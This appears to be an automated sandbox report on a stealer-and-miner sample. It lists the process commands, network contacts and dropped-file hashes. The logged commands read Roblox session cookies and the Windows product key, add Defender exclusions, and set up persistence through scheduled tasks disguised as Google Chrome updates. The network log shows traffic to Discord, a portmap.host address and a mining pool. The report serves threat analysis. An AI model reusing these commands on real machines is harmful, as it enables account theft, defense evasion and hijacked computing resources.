AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\voqj5sl0\voqj5sl0.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2258.tmp" "c:\Users\Admin\AppData\Local\Temp\voqj5sl0\CSCC4B3F11C9D8E45809981B1A3FF14C8.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 964"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 964
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1492"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1492
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2404"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2404
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4040"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4040
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1816"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1816
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3728"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3728
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 964"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 964
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1492"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1492
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2404"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2404
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4040"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4040
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1816"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1816
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3728"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 3728
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI13522\rar.exe a -r -hp"xen" "C:\Users\Admin\AppData\Local\Temp\oMCn7.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI13522\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI13522\rar.exe a -r -hp"xen" "C:\Users\Admin\AppData\Local\Temp\oMCn7.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EREisLxG4sc5.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AOkJs4DSWUFF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\naeyuqz1Swxt.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sojzIHAhB2JF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OOapYUCiS0i7.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\grA0XvRC3bdm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iESF773nBs3y.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uokA3JJKNARC.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Z3yEuHBw6iM2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1jyL9jGzgQvY.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9aWZQfAb9CU7.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DbDLv24pHqbZ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\laoBokeTraYb.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-nt3th.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
Files
memory/1832-0-0x00007FFE11293000-0x00007FFE11295000-memory.dmp
memory/1832-1-0x0000000000430000-0x000000000475C000-memory.dmp
memory/1832-2-0x00007FFE11290000-0x00007FFE11D51000-memory.dmp
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
memory/2596-22-0x00007FFE11290000-0x00007FFE11D51000-memory.dmp
memory/2596-38-0x00007FFE11290000-0x00007FFE11D51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI13522\python311.dll
| MD5 | 5792adeab1e4414e0129ce7a228eb8b8 |
| SHA1 | e9f022e687b6d88d20ee96d9509f82e916b9ee8c |
| SHA256 | 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967 |
| SHA512 | c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\VCRUNTIME140.dll
| MD5 | 4585a96cc4eef6aafd5e27ea09147dc6 |
| SHA1 | 489cfff1b19abbec98fda26ac8958005e88dd0cb |
| SHA256 | a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736 |
| SHA512 | d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286 |
memory/2596-43-0x00007FFE11290000-0x00007FFE11D51000-memory.dmp
memory/1360-45-0x00007FFE0BF30000-0x00007FFE0C519000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI13522\base_library.zip
| MD5 | e17ce7183e682de459eec1a5ac9cbbff |
| SHA1 | 722968ca6eb123730ebc30ff2d498f9a5dad4cc1 |
| SHA256 | ff6a37c49ee4bb07a763866d4163126165038296c1fb7b730928297c25cfbe6d |
| SHA512 | fab76b59dcd3570695fa260f56e277f8d714048f3d89f6e9f69ea700fca7c097d0db5f5294beab4e6409570408f1d680e8220851fededb981acb129a415358d1 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\_ctypes.pyd
| MD5 | 1adfe4d0f4d68c9c539489b89717984d |
| SHA1 | 8ae31b831b3160f5b88dda58ad3959c7423f8eb2 |
| SHA256 | 64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c |
| SHA512 | b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\blank.aes
| MD5 | 9baaf674093c1a16ec32e34132f51322 |
| SHA1 | afc51b60ec89af834297e01229566be5b27fab75 |
| SHA256 | 55f06f3d9f2b0a02f4d4e663a4416c0268315b0b30120b6174a2db517f0de8c4 |
| SHA512 | aff6512ca8002573d1c7b95aeaefe7bc6d22d028ef9fc8b4c1ce7537911c8e5a36bdc842685d224761d643f743b0e8c3029945d10601a993889752cf41f82123 |
memory/2596-60-0x000002A3E6F50000-0x000002A3E6F72000-memory.dmp
memory/1360-58-0x00007FFE25C30000-0x00007FFE25C3F000-memory.dmp
memory/1360-57-0x00007FFE21A60000-0x00007FFE21A83000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_shwvl44q.hca.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\_lzma.pyd
| MD5 | 3798175fd77eded46a8af6b03c5e5f6d |
| SHA1 | f637eaf42080dcc620642400571473a3fdf9174f |
| SHA256 | 3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41 |
| SHA512 | 1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\sqlite3.dll
| MD5 | 395332e795cb6abaca7d0126d6c1f215 |
| SHA1 | b845bd8864cd35dcb61f6db3710acc2659ed9f18 |
| SHA256 | 8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c |
| SHA512 | 8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\_sqlite3.pyd
| MD5 | eb6313b94292c827a5758eea82d018d9 |
| SHA1 | 7070f715d088c669eda130d0f15e4e4e9c4b7961 |
| SHA256 | 6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da |
| SHA512 | 23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\_bz2.pyd
| MD5 | 2d461b41f6e9a305dde68e9c59e4110a |
| SHA1 | 97c2266f47a651e37a72c153116d81d93c7556e8 |
| SHA256 | abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4 |
| SHA512 | eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8 |
memory/1360-75-0x00007FFE20D70000-0x00007FFE20D9D000-memory.dmp
memory/1360-84-0x00007FFE070D0000-0x00007FFE07247000-memory.dmp
memory/1360-83-0x00007FFE20CF0000-0x00007FFE20D13000-memory.dmp
memory/1360-82-0x00007FFE21320000-0x00007FFE21339000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI13522\_socket.pyd
| MD5 | bcc3e26a18d59d76fd6cf7cd64e9e14d |
| SHA1 | b85e4e7d300dbeec942cb44e4a38f2c6314d3166 |
| SHA256 | 4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98 |
| SHA512 | 65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74 |
C:\Users\Admin\AppData\Local\Temp\_MEI13522\select.pyd
| MD5 | 90fea71c9828751e36c00168b9ba4b2b |
| SHA1 | 15b506df7d02612e3ba49f816757ad0c141e9dc1 |
| SHA256 | 5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d |
| SHA512 | e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5 |
memory/1360-98-0x00007FFE07010000-0x00007FFE070C8000-memory.dmp
